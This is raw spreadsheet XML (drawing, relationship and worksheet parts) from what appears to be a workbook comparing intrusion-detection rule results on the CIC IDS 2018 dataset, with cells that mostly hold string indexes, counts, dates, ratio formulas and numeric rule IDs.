      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="28" name="Chart 28"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xdr:col>
      <xdr:colOff>1038225</xdr:colOff>
      <xdr:row>180</xdr:row>
      <xdr:rowOff>66675</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="29" name="Chart 29"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xdr:col>
      <xdr:colOff>1085850</xdr:colOff>
      <xdr:row>200</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="30" name="Chart 30"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4</xdr:col>
      <xdr:colOff>1438275</xdr:colOff>
      <xdr:row>199</xdr:row>
      <xdr:rowOff>142875</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="31" name="Chart 31" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId10"/>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ip/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.unb.ca/cic/datasets/ids-2018.htm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idus.us.es/bitstream/handle/11441/159132/TFG4947_Garc%C3%ADaClavero.pdf?sequence=2&amp;isAllowed=y" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://idus.us.es/handle/11441/143609" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://biblus.us.es/bibing/proyectos/abreproy/94340/fichero/TFG-4340+GARC%C3%8DA+CORONADO%2C+ANDR%C3%89S.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.unb.ca/cic/datasets/ids-2018.html" TargetMode="External"/><Relationship Id="rId5"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38"/>
    <col customWidth="1" min="4" max="4" width="69.25"/>
    <col customWidth="1" min="5" max="5" width="21.5"/>
    <col customWidth="1" min="6" max="6" width="24.25"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="4">
      <c r="C4" s="2" t="s">
        <v>1</v>
      </c>
      <c r="D4" s="3"/>
      <c r="E4" s="3"/>
      <c r="F4" s="3"/>
      <c r="G4" s="3"/>
      <c r="H4" s="3"/>
      <c r="I4" s="3"/>
      <c r="J4" s="4"/>
    </row>
    <row r="5">
      <c r="C5" s="5"/>
      <c r="D5" s="6"/>
      <c r="E5" s="6"/>
      <c r="F5" s="6"/>
      <c r="G5" s="6"/>
      <c r="H5" s="6"/>
      <c r="I5" s="6"/>
      <c r="J5" s="7"/>
    </row>
    <row r="7" ht="19.5" customHeight="1">
      <c r="C7" s="8" t="s">
        <v>2</v>
      </c>
      <c r="D7" s="9" t="s">
        <v>3</v>
      </c>
      <c r="E7" s="9" t="s">
        <v>4</v>
      </c>
      <c r="F7" s="9" t="s">
        <v>5</v>
      </c>
      <c r="G7" s="9" t="s">
        <v>6</v>
      </c>
      <c r="H7" s="9" t="s">
        <v>7</v>
      </c>
      <c r="I7" s="9" t="s">
        <v>8</v>
      </c>
      <c r="J7" s="10" t="s">
        <v>9</v>
      </c>
      <c r="K7" s="11"/>
      <c r="L7" s="11"/>
      <c r="M7" s="11"/>
      <c r="N7" s="11"/>
      <c r="O7" s="11"/>
      <c r="P7" s="11"/>
    </row>
    <row r="8" ht="51.75" customHeight="1">
      <c r="C8" s="12" t="s">
        <v>10</v>
      </c>
      <c r="D8" s="13" t="s">
        <v>11</v>
      </c>
      <c r="E8" s="14" t="s">
        <v>12</v>
      </c>
      <c r="F8" s="15">
        <v>45442.0</v>
      </c>
      <c r="G8" s="16" t="s">
        <v>13</v>
      </c>
      <c r="H8" s="17" t="s">
        <v>13</v>
      </c>
      <c r="I8" s="18" t="s">
        <v>13</v>
      </c>
      <c r="J8" s="19" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="9" ht="51.75" customHeight="1">
      <c r="C9" s="20" t="s">
        <v>14</v>
      </c>
      <c r="D9" s="21" t="s">
        <v>15</v>
      </c>
      <c r="E9" s="22" t="s">
        <v>12</v>
      </c>
      <c r="F9" s="23">
        <v>45442.0</v>
      </c>
      <c r="G9" s="24"/>
      <c r="H9" s="25"/>
      <c r="I9" s="26" t="s">
        <v>13</v>
      </c>
      <c r="J9" s="27" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="10" ht="51.75" customHeight="1">
      <c r="C10" s="20" t="s">
        <v>16</v>
      </c>
      <c r="D10" s="21" t="s">
        <v>17</v>
      </c>
      <c r="E10" s="22">
        <v>10605.0</v>
      </c>
      <c r="F10" s="23">
        <v>45441.0</v>
      </c>
      <c r="G10" s="24"/>
      <c r="H10" s="28" t="s">
        <v>13</v>
      </c>
      <c r="I10" s="26" t="s">
        <v>13</v>
      </c>
      <c r="J10" s="29"/>
    </row>
    <row r="11" ht="51.75" customHeight="1">
      <c r="C11" s="30" t="s">
        <v>18</v>
      </c>
      <c r="D11" s="31" t="s">
        <v>19</v>
      </c>
      <c r="E11" s="31" t="s">
        <v>12</v>
      </c>
      <c r="F11" s="32">
        <v>45441.0</v>
      </c>
      <c r="G11" s="33"/>
      <c r="H11" s="34"/>
      <c r="I11" s="35"/>
      <c r="J11" s="36" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="12" ht="21.75" customHeight="1"/>
    <row r="13">
      <c r="C13" s="37"/>
      <c r="D13" s="37"/>
      <c r="E13" s="37"/>
      <c r="F13" s="37"/>
      <c r="G13" s="37"/>
      <c r="H13" s="37"/>
    </row>
    <row r="14">
      <c r="C14" s="2" t="s">
        <v>20</v>
      </c>
      <c r="D14" s="3"/>
      <c r="E14" s="3"/>
      <c r="F14" s="3"/>
      <c r="G14" s="3"/>
      <c r="H14" s="3"/>
      <c r="I14" s="3"/>
      <c r="J14" s="4"/>
    </row>
    <row r="15">
      <c r="C15" s="5"/>
      <c r="D15" s="6"/>
      <c r="E15" s="6"/>
      <c r="F15" s="6"/>
      <c r="G15" s="6"/>
      <c r="H15" s="6"/>
      <c r="I15" s="6"/>
      <c r="J15" s="7"/>
    </row>
    <row r="17">
      <c r="C17" s="8" t="s">
        <v>21</v>
      </c>
      <c r="D17" s="9" t="s">
        <v>3</v>
      </c>
      <c r="E17" s="9" t="s">
        <v>22</v>
      </c>
      <c r="F17" s="9" t="s">
        <v>23</v>
      </c>
      <c r="G17" s="9" t="s">
        <v>5</v>
      </c>
      <c r="H17" s="10" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="18" ht="44.25" customHeight="1">
      <c r="C18" s="38" t="s">
        <v>25</v>
      </c>
      <c r="D18" s="39" t="s">
        <v>26</v>
      </c>
      <c r="E18" s="40" t="s">
        <v>27</v>
      </c>
      <c r="F18" s="31" t="s">
        <v>28</v>
      </c>
      <c r="G18" s="32">
        <v>45477.0</v>
      </c>
      <c r="H18" s="41" t="s">
        <v>29</v>
      </c>
      <c r="I18" s="11"/>
      <c r="J18" s="42"/>
    </row>
    <row r="20">
      <c r="G20" s="1" t="s">
        <v>30</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="C4:J5"/>
    <mergeCell ref="C14:J1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8" width="25.13"/>
    <col customWidth="1" min="9" max="9" width="32.13"/>
    <col customWidth="1" min="10" max="10" width="27.63"/>
    <col customWidth="1" min="11" max="28" width="41.75"/>
    <col customWidth="1" min="29" max="29" width="42.13"/>
    <col customWidth="1" min="30" max="41" width="25.13"/>
    <col customWidth="1" min="42" max="48" width="34.0"/>
    <col customWidth="1" min="49" max="49" width="51.75"/>
    <col customWidth="1" min="50" max="50" width="44.25"/>
    <col customWidth="1" min="51" max="51" width="34.0"/>
    <col customWidth="1" min="52" max="56" width="25.13"/>
    <col customWidth="1" min="57" max="74" width="38.75"/>
    <col customWidth="1" min="75" max="79" width="25.13"/>
    <col customWidth="1" min="80" max="91" width="33.5"/>
    <col customWidth="1" min="92" max="92" width="39.13"/>
    <col customWidth="1" min="93" max="93" width="41.63"/>
    <col customWidth="1" min="94" max="94" width="33.5"/>
    <col customWidth="1" min="95" max="95" width="39.38"/>
    <col customWidth="1" min="96" max="96" width="39.25"/>
    <col customWidth="1" min="97" max="97" width="33.5"/>
    <col customWidth="1" min="98" max="98" width="25.13"/>
    <col customWidth="1" min="99" max="99" width="26.88"/>
    <col customWidth="1" min="100" max="102" width="25.13"/>
    <col customWidth="1" min="103" max="115" width="32.88"/>
    <col customWidth="1" min="116" max="116" width="43.38"/>
    <col customWidth="1" min="117" max="117" width="32.88"/>
    <col customWidth="1" min="118" max="118" width="42.13"/>
    <col customWidth="1" min="119" max="119" width="39.25"/>
    <col customWidth="1" min="120" max="120" width="32.88"/>
    <col customWidth="1" min="121" max="121" width="25.13"/>
    <col customWidth="1" min="122" max="122" width="53.75"/>
    <col customWidth="1" min="123" max="131" width="25.13"/>
    <col customWidth="1" min="132" max="135" width="35.88"/>
    <col customWidth="1" min="136" max="143" width="35.38"/>
  </cols>
  <sheetData>
    <row r="1" ht="31.5" customHeight="1">
      <c r="B1" s="43"/>
      <c r="C1" s="43"/>
      <c r="D1" s="43"/>
      <c r="E1" s="43"/>
      <c r="F1" s="43"/>
      <c r="G1" s="43"/>
      <c r="H1" s="43"/>
      <c r="I1" s="44"/>
      <c r="J1" s="44"/>
      <c r="K1" s="44"/>
      <c r="L1" s="44"/>
      <c r="M1" s="44"/>
      <c r="N1" s="44"/>
      <c r="O1" s="44"/>
      <c r="P1" s="44"/>
      <c r="Q1" s="44"/>
      <c r="R1" s="44"/>
      <c r="S1" s="44"/>
      <c r="T1" s="44"/>
      <c r="U1" s="44"/>
      <c r="V1" s="44"/>
      <c r="W1" s="44"/>
      <c r="X1" s="44"/>
      <c r="Y1" s="44"/>
      <c r="Z1" s="44"/>
      <c r="AA1" s="44"/>
      <c r="AB1" s="44"/>
      <c r="AC1" s="44"/>
      <c r="AD1" s="45" t="s">
        <v>6</v>
      </c>
      <c r="AE1" s="46"/>
      <c r="AF1" s="46"/>
      <c r="AG1" s="46"/>
      <c r="AH1" s="46"/>
      <c r="AI1" s="46"/>
      <c r="AJ1" s="46"/>
      <c r="AK1" s="46"/>
      <c r="AL1" s="46"/>
      <c r="AM1" s="46"/>
      <c r="AN1" s="46"/>
      <c r="AO1" s="46"/>
      <c r="AP1" s="46"/>
      <c r="AQ1" s="46"/>
      <c r="AR1" s="46"/>
      <c r="AS1" s="46"/>
      <c r="AT1" s="46"/>
      <c r="AU1" s="46"/>
      <c r="AV1" s="46"/>
      <c r="AW1" s="46"/>
      <c r="AX1" s="46"/>
      <c r="AY1" s="46"/>
      <c r="AZ1" s="47"/>
      <c r="BA1" s="48" t="s">
        <v>7</v>
      </c>
      <c r="BB1" s="46"/>
      <c r="BC1" s="46"/>
      <c r="BD1" s="46"/>
      <c r="BE1" s="46"/>
      <c r="BF1" s="46"/>
      <c r="BG1" s="46"/>
      <c r="BH1" s="46"/>
      <c r="BI1" s="46"/>
      <c r="BJ1" s="46"/>
      <c r="BK1" s="46"/>
      <c r="BL1" s="46"/>
      <c r="BM1" s="46"/>
      <c r="BN1" s="46"/>
      <c r="BO1" s="46"/>
      <c r="BP1" s="46"/>
      <c r="BQ1" s="46"/>
      <c r="BR1" s="46"/>
      <c r="BS1" s="46"/>
      <c r="BT1" s="46"/>
      <c r="BU1" s="46"/>
      <c r="BV1" s="46"/>
      <c r="BW1" s="47"/>
      <c r="BX1" s="49" t="s">
        <v>8</v>
      </c>
      <c r="BY1" s="46"/>
      <c r="BZ1" s="46"/>
      <c r="CA1" s="46"/>
      <c r="CB1" s="46"/>
      <c r="CC1" s="46"/>
      <c r="CD1" s="46"/>
      <c r="CE1" s="46"/>
      <c r="CF1" s="46"/>
      <c r="CG1" s="46"/>
      <c r="CH1" s="46"/>
      <c r="CI1" s="46"/>
      <c r="CJ1" s="46"/>
      <c r="CK1" s="46"/>
      <c r="CL1" s="46"/>
      <c r="CM1" s="46"/>
      <c r="CN1" s="46"/>
      <c r="CO1" s="46"/>
      <c r="CP1" s="46"/>
      <c r="CQ1" s="46"/>
      <c r="CR1" s="46"/>
      <c r="CS1" s="46"/>
      <c r="CT1" s="47"/>
      <c r="CU1" s="50" t="s">
        <v>9</v>
      </c>
      <c r="CV1" s="46"/>
      <c r="CW1" s="46"/>
      <c r="CX1" s="46"/>
      <c r="CY1" s="46"/>
      <c r="CZ1" s="46"/>
      <c r="DA1" s="46"/>
      <c r="DB1" s="46"/>
      <c r="DC1" s="46"/>
      <c r="DD1" s="46"/>
      <c r="DE1" s="46"/>
      <c r="DF1" s="46"/>
      <c r="DG1" s="46"/>
      <c r="DH1" s="46"/>
      <c r="DI1" s="46"/>
      <c r="DJ1" s="46"/>
      <c r="DK1" s="46"/>
      <c r="DL1" s="46"/>
      <c r="DM1" s="46"/>
      <c r="DN1" s="46"/>
      <c r="DO1" s="46"/>
      <c r="DP1" s="46"/>
      <c r="DQ1" s="47"/>
      <c r="DR1" s="51"/>
      <c r="DS1" s="52" t="s">
        <v>20</v>
      </c>
      <c r="DT1" s="53"/>
      <c r="DU1" s="53"/>
      <c r="DV1" s="53"/>
      <c r="DW1" s="53"/>
      <c r="DX1" s="53"/>
      <c r="DY1" s="53"/>
      <c r="DZ1" s="53"/>
      <c r="EA1" s="54"/>
    </row>
    <row r="2" ht="30.0" customHeight="1">
      <c r="B2" s="55" t="s">
        <v>31</v>
      </c>
      <c r="C2" s="56" t="s">
        <v>32</v>
      </c>
      <c r="D2" s="56" t="s">
        <v>33</v>
      </c>
      <c r="E2" s="57" t="s">
        <v>34</v>
      </c>
      <c r="F2" s="57" t="s">
        <v>35</v>
      </c>
      <c r="G2" s="57" t="s">
        <v>36</v>
      </c>
      <c r="H2" s="57" t="s">
        <v>37</v>
      </c>
      <c r="I2" s="57" t="s">
        <v>38</v>
      </c>
      <c r="J2" s="57" t="s">
        <v>39</v>
      </c>
      <c r="K2" s="58" t="s">
        <v>40</v>
      </c>
      <c r="L2" s="58" t="s">
        <v>41</v>
      </c>
      <c r="M2" s="58" t="s">
        <v>42</v>
      </c>
      <c r="N2" s="58" t="s">
        <v>43</v>
      </c>
      <c r="O2" s="58" t="s">
        <v>44</v>
      </c>
      <c r="P2" s="59" t="s">
        <v>45</v>
      </c>
      <c r="Q2" s="59" t="s">
        <v>46</v>
      </c>
      <c r="R2" s="60" t="s">
        <v>47</v>
      </c>
      <c r="S2" s="60" t="s">
        <v>48</v>
      </c>
      <c r="T2" s="60" t="s">
        <v>49</v>
      </c>
      <c r="U2" s="61" t="s">
        <v>50</v>
      </c>
      <c r="V2" s="60" t="s">
        <v>51</v>
      </c>
      <c r="W2" s="62" t="s">
        <v>52</v>
      </c>
      <c r="X2" s="60" t="s">
        <v>53</v>
      </c>
      <c r="Y2" s="60" t="s">
        <v>54</v>
      </c>
      <c r="Z2" s="60" t="s">
        <v>55</v>
      </c>
      <c r="AA2" s="60" t="s">
        <v>56</v>
      </c>
      <c r="AB2" s="61" t="s">
        <v>57</v>
      </c>
      <c r="AC2" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AD2" s="63" t="s">
        <v>59</v>
      </c>
      <c r="AE2" s="63" t="s">
        <v>60</v>
      </c>
      <c r="AF2" s="63" t="s">
        <v>61</v>
      </c>
      <c r="AG2" s="64" t="s">
        <v>62</v>
      </c>
      <c r="AH2" s="65" t="s">
        <v>63</v>
      </c>
      <c r="AI2" s="65" t="s">
        <v>64</v>
      </c>
      <c r="AJ2" s="65" t="s">
        <v>65</v>
      </c>
      <c r="AK2" s="65" t="s">
        <v>66</v>
      </c>
      <c r="AL2" s="65" t="s">
        <v>67</v>
      </c>
      <c r="AM2" s="65" t="s">
        <v>68</v>
      </c>
      <c r="AN2" s="65" t="s">
        <v>69</v>
      </c>
      <c r="AO2" s="65" t="s">
        <v>70</v>
      </c>
      <c r="AP2" s="66" t="s">
        <v>71</v>
      </c>
      <c r="AQ2" s="66" t="s">
        <v>72</v>
      </c>
      <c r="AR2" s="66" t="s">
        <v>73</v>
      </c>
      <c r="AS2" s="66" t="s">
        <v>74</v>
      </c>
      <c r="AT2" s="66" t="s">
        <v>75</v>
      </c>
      <c r="AU2" s="66" t="s">
        <v>76</v>
      </c>
      <c r="AV2" s="66" t="s">
        <v>77</v>
      </c>
      <c r="AW2" s="66" t="s">
        <v>78</v>
      </c>
      <c r="AX2" s="66" t="s">
        <v>79</v>
      </c>
      <c r="AY2" s="66" t="s">
        <v>80</v>
      </c>
      <c r="AZ2" s="66" t="s">
        <v>81</v>
      </c>
      <c r="BA2" s="63" t="s">
        <v>59</v>
      </c>
      <c r="BB2" s="63" t="s">
        <v>60</v>
      </c>
      <c r="BC2" s="63" t="s">
        <v>61</v>
      </c>
      <c r="BD2" s="64" t="s">
        <v>62</v>
      </c>
      <c r="BE2" s="65" t="s">
        <v>82</v>
      </c>
      <c r="BF2" s="65" t="s">
        <v>64</v>
      </c>
      <c r="BG2" s="65" t="s">
        <v>65</v>
      </c>
      <c r="BH2" s="65" t="s">
        <v>66</v>
      </c>
      <c r="BI2" s="65" t="s">
        <v>67</v>
      </c>
      <c r="BJ2" s="65" t="s">
        <v>68</v>
      </c>
      <c r="BK2" s="65" t="s">
        <v>69</v>
      </c>
      <c r="BL2" s="65" t="s">
        <v>70</v>
      </c>
      <c r="BM2" s="66" t="s">
        <v>71</v>
      </c>
      <c r="BN2" s="66" t="s">
        <v>83</v>
      </c>
      <c r="BO2" s="66" t="s">
        <v>73</v>
      </c>
      <c r="BP2" s="66" t="s">
        <v>74</v>
      </c>
      <c r="BQ2" s="66" t="s">
        <v>75</v>
      </c>
      <c r="BR2" s="66" t="s">
        <v>76</v>
      </c>
      <c r="BS2" s="66" t="s">
        <v>77</v>
      </c>
      <c r="BT2" s="66" t="s">
        <v>78</v>
      </c>
      <c r="BU2" s="66" t="s">
        <v>79</v>
      </c>
      <c r="BV2" s="66" t="s">
        <v>80</v>
      </c>
      <c r="BW2" s="66" t="s">
        <v>81</v>
      </c>
      <c r="BX2" s="63" t="s">
        <v>59</v>
      </c>
      <c r="BY2" s="63" t="s">
        <v>60</v>
      </c>
      <c r="BZ2" s="63" t="s">
        <v>61</v>
      </c>
      <c r="CA2" s="64" t="s">
        <v>62</v>
      </c>
      <c r="CB2" s="65" t="s">
        <v>82</v>
      </c>
      <c r="CC2" s="65" t="s">
        <v>64</v>
      </c>
      <c r="CD2" s="65" t="s">
        <v>65</v>
      </c>
      <c r="CE2" s="65" t="s">
        <v>66</v>
      </c>
      <c r="CF2" s="65" t="s">
        <v>67</v>
      </c>
      <c r="CG2" s="65" t="s">
        <v>68</v>
      </c>
      <c r="CH2" s="65" t="s">
        <v>69</v>
      </c>
      <c r="CI2" s="65" t="s">
        <v>70</v>
      </c>
      <c r="CJ2" s="66" t="s">
        <v>71</v>
      </c>
      <c r="CK2" s="66" t="s">
        <v>83</v>
      </c>
      <c r="CL2" s="66" t="s">
        <v>73</v>
      </c>
      <c r="CM2" s="66" t="s">
        <v>74</v>
      </c>
      <c r="CN2" s="66" t="s">
        <v>75</v>
      </c>
      <c r="CO2" s="66" t="s">
        <v>76</v>
      </c>
      <c r="CP2" s="66" t="s">
        <v>77</v>
      </c>
      <c r="CQ2" s="66" t="s">
        <v>78</v>
      </c>
      <c r="CR2" s="66" t="s">
        <v>79</v>
      </c>
      <c r="CS2" s="66" t="s">
        <v>80</v>
      </c>
      <c r="CT2" s="66" t="s">
        <v>81</v>
      </c>
      <c r="CU2" s="63" t="s">
        <v>59</v>
      </c>
      <c r="CV2" s="63" t="s">
        <v>60</v>
      </c>
      <c r="CW2" s="63" t="s">
        <v>61</v>
      </c>
      <c r="CX2" s="64" t="s">
        <v>62</v>
      </c>
      <c r="CY2" s="65" t="s">
        <v>82</v>
      </c>
      <c r="CZ2" s="65" t="s">
        <v>64</v>
      </c>
      <c r="DA2" s="65" t="s">
        <v>65</v>
      </c>
      <c r="DB2" s="65" t="s">
        <v>66</v>
      </c>
      <c r="DC2" s="65" t="s">
        <v>67</v>
      </c>
      <c r="DD2" s="65" t="s">
        <v>68</v>
      </c>
      <c r="DE2" s="65" t="s">
        <v>69</v>
      </c>
      <c r="DF2" s="65" t="s">
        <v>70</v>
      </c>
      <c r="DG2" s="66" t="s">
        <v>71</v>
      </c>
      <c r="DH2" s="66" t="s">
        <v>83</v>
      </c>
      <c r="DI2" s="66" t="s">
        <v>73</v>
      </c>
      <c r="DJ2" s="66" t="s">
        <v>74</v>
      </c>
      <c r="DK2" s="66" t="s">
        <v>75</v>
      </c>
      <c r="DL2" s="66" t="s">
        <v>76</v>
      </c>
      <c r="DM2" s="66" t="s">
        <v>77</v>
      </c>
      <c r="DN2" s="66" t="s">
        <v>78</v>
      </c>
      <c r="DO2" s="66" t="s">
        <v>79</v>
      </c>
      <c r="DP2" s="66" t="s">
        <v>80</v>
      </c>
      <c r="DQ2" s="66" t="s">
        <v>81</v>
      </c>
      <c r="DR2" s="66" t="s">
        <v>84</v>
      </c>
      <c r="DS2" s="67" t="s">
        <v>85</v>
      </c>
      <c r="DT2" s="68" t="s">
        <v>86</v>
      </c>
      <c r="DU2" s="68" t="s">
        <v>61</v>
      </c>
      <c r="DV2" s="69" t="s">
        <v>87</v>
      </c>
      <c r="DW2" s="69" t="s">
        <v>88</v>
      </c>
      <c r="DX2" s="69" t="s">
        <v>89</v>
      </c>
      <c r="DY2" s="69" t="s">
        <v>90</v>
      </c>
      <c r="DZ2" s="69" t="s">
        <v>91</v>
      </c>
      <c r="EA2" s="68" t="s">
        <v>92</v>
      </c>
      <c r="EB2" s="69" t="s">
        <v>93</v>
      </c>
      <c r="EC2" s="69" t="s">
        <v>94</v>
      </c>
      <c r="ED2" s="69" t="s">
        <v>95</v>
      </c>
      <c r="EE2" s="70" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="3" ht="153.75" customHeight="1">
      <c r="B3" s="71" t="s">
        <v>97</v>
      </c>
      <c r="C3" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D3" s="72" t="s">
        <v>98</v>
      </c>
      <c r="E3" s="72" t="s">
        <v>99</v>
      </c>
      <c r="F3" s="72" t="s">
        <v>100</v>
      </c>
      <c r="G3" s="72" t="s">
        <v>101</v>
      </c>
      <c r="H3" s="72" t="s">
        <v>102</v>
      </c>
      <c r="I3" s="73" t="s">
        <v>103</v>
      </c>
      <c r="J3" s="73" t="s">
        <v>104</v>
      </c>
      <c r="K3" s="73" t="s">
        <v>105</v>
      </c>
      <c r="L3" s="74">
        <v>2059.0</v>
      </c>
      <c r="M3" s="74">
        <v>2049.0</v>
      </c>
      <c r="N3" s="74">
        <v>2060.0</v>
      </c>
      <c r="O3" s="74">
        <f t="shared" ref="O3:O133" si="1">P3+Q3</f>
        <v>2060</v>
      </c>
      <c r="P3" s="74">
        <v>2060.0</v>
      </c>
      <c r="Q3" s="74">
        <v>0.0</v>
      </c>
      <c r="R3" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S3" s="76" t="s">
        <v>107</v>
      </c>
      <c r="T3" s="76" t="s">
        <v>108</v>
      </c>
      <c r="U3" s="77" t="s">
        <v>109</v>
      </c>
      <c r="V3" s="76" t="s">
        <v>110</v>
      </c>
      <c r="W3" s="76" t="s">
        <v>111</v>
      </c>
      <c r="X3" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y3" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z3" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA3" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AB3" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC3" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD3" s="78" t="s">
        <v>113</v>
      </c>
      <c r="AE3" s="78">
        <v>2.0</v>
      </c>
      <c r="AF3" s="78">
        <v>4.0</v>
      </c>
      <c r="AG3" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH3" s="78" t="s">
        <v>113</v>
      </c>
      <c r="AI3" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AJ3" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AK3" s="78" t="str">
        <f t="shared" ref="AK3:AK133" si="2">IF(AI3="-",AJ3,AI3)</f>
        <v>-</v>
      </c>
      <c r="AL3" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AM3" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AN3" s="78" t="s">
        <v>114</v>
      </c>
      <c r="AO3" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AP3" s="80">
        <v>2058.0</v>
      </c>
      <c r="AQ3" s="80">
        <v>4.0</v>
      </c>
      <c r="AR3" s="80">
        <v>4.0</v>
      </c>
      <c r="AS3" s="80">
        <v>4.0</v>
      </c>
      <c r="AT3" s="80">
        <v>4.0</v>
      </c>
      <c r="AU3" s="80">
        <v>4.0</v>
      </c>
      <c r="AV3" s="80">
        <v>4.0</v>
      </c>
      <c r="AW3" s="80"/>
      <c r="AX3" s="80"/>
      <c r="AY3" s="80"/>
      <c r="AZ3" s="81">
        <f t="shared" ref="AZ3:AZ133" si="3">AS3/P3</f>
        <v>0.001941747573</v>
      </c>
      <c r="BA3" s="82" t="s">
        <v>115</v>
      </c>
      <c r="BB3" s="82">
        <v>15.0</v>
      </c>
      <c r="BC3" s="82">
        <v>40.0</v>
      </c>
      <c r="BD3" s="79" t="s">
        <v>116</v>
      </c>
      <c r="BE3" s="82" t="s">
        <v>117</v>
      </c>
      <c r="BF3" s="82" t="s">
        <v>118</v>
      </c>
      <c r="BG3" s="82"/>
      <c r="BH3" s="82" t="str">
        <f t="shared" ref="BH3:BH133" si="4">IF(BF3="-",BG3,BF3)</f>
        <v>2013409, 2034730, 2034718, 2023753</v>
      </c>
      <c r="BI3" s="82" t="s">
        <v>118</v>
      </c>
      <c r="BJ3" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BK3" s="82" t="s">
        <v>119</v>
      </c>
      <c r="BL3" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BM3" s="83">
        <v>2057.0</v>
      </c>
      <c r="BN3" s="83">
        <v>29.0</v>
      </c>
      <c r="BO3" s="83">
        <v>30.0</v>
      </c>
      <c r="BP3" s="83">
        <v>40.0</v>
      </c>
      <c r="BQ3" s="83">
        <v>25.0</v>
      </c>
      <c r="BR3" s="83">
        <v>26.0</v>
      </c>
      <c r="BS3" s="83">
        <v>36.0</v>
      </c>
      <c r="BT3" s="83"/>
      <c r="BU3" s="83"/>
      <c r="BV3" s="83"/>
      <c r="BW3" s="84">
        <f t="shared" ref="BW3:BW133" si="5">BP3/P3</f>
        <v>0.01941747573</v>
      </c>
      <c r="BX3" s="85" t="s">
        <v>120</v>
      </c>
      <c r="BY3" s="85">
        <v>22.0</v>
      </c>
      <c r="BZ3" s="85">
        <v>72.0</v>
      </c>
      <c r="CA3" s="79" t="s">
        <v>121</v>
      </c>
      <c r="CB3" s="85" t="s">
        <v>122</v>
      </c>
      <c r="CC3" s="85" t="s">
        <v>123</v>
      </c>
      <c r="CD3" s="85"/>
      <c r="CE3" s="85" t="str">
        <f t="shared" ref="CE3:CE133" si="6">IF(CC3="-",CD3,CC3)</f>
        <v>49040, 2013409, 2034730, 2034718, 44484, 44485, 44487, 44489, 50447</v>
      </c>
      <c r="CF3" s="85" t="s">
        <v>124</v>
      </c>
      <c r="CG3" s="85" t="s">
        <v>125</v>
      </c>
      <c r="CH3" s="85" t="s">
        <v>126</v>
      </c>
      <c r="CI3" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CJ3" s="86">
        <v>2058.0</v>
      </c>
      <c r="CK3" s="86">
        <v>31.0</v>
      </c>
      <c r="CL3" s="86">
        <v>32.0</v>
      </c>
      <c r="CM3" s="86">
        <v>47.0</v>
      </c>
      <c r="CN3" s="86">
        <v>27.0</v>
      </c>
      <c r="CO3" s="86">
        <v>28.0</v>
      </c>
      <c r="CP3" s="86">
        <v>37.0</v>
      </c>
      <c r="CQ3" s="86"/>
      <c r="CR3" s="86"/>
      <c r="CS3" s="86"/>
      <c r="CT3" s="87">
        <f t="shared" ref="CT3:CT133" si="7">CM3/P3</f>
        <v>0.02281553398</v>
      </c>
      <c r="CU3" s="88" t="s">
        <v>127</v>
      </c>
      <c r="CV3" s="88">
        <v>31.0</v>
      </c>
      <c r="CW3" s="88">
        <v>96.0</v>
      </c>
      <c r="CX3" s="79" t="s">
        <v>128</v>
      </c>
      <c r="CY3" s="88" t="s">
        <v>129</v>
      </c>
      <c r="CZ3" s="88" t="s">
        <v>130</v>
      </c>
      <c r="DA3" s="88"/>
      <c r="DB3" s="88" t="str">
        <f t="shared" ref="DB3:DB133" si="8">IF(CZ3="-",DA3,CZ3)</f>
        <v>49040, 2013409, 2034730, 2034718, 2003099, 2007571, 2100615, 44484, 44485, 44487, 44489, 50447, 2002749, 2002752, 2006408, 2100472, 2101418</v>
      </c>
      <c r="DC3" s="88" t="s">
        <v>131</v>
      </c>
      <c r="DD3" s="88" t="s">
        <v>132</v>
      </c>
      <c r="DE3" s="88" t="s">
        <v>133</v>
      </c>
      <c r="DF3" s="88" t="s">
        <v>12</v>
      </c>
      <c r="DG3" s="89">
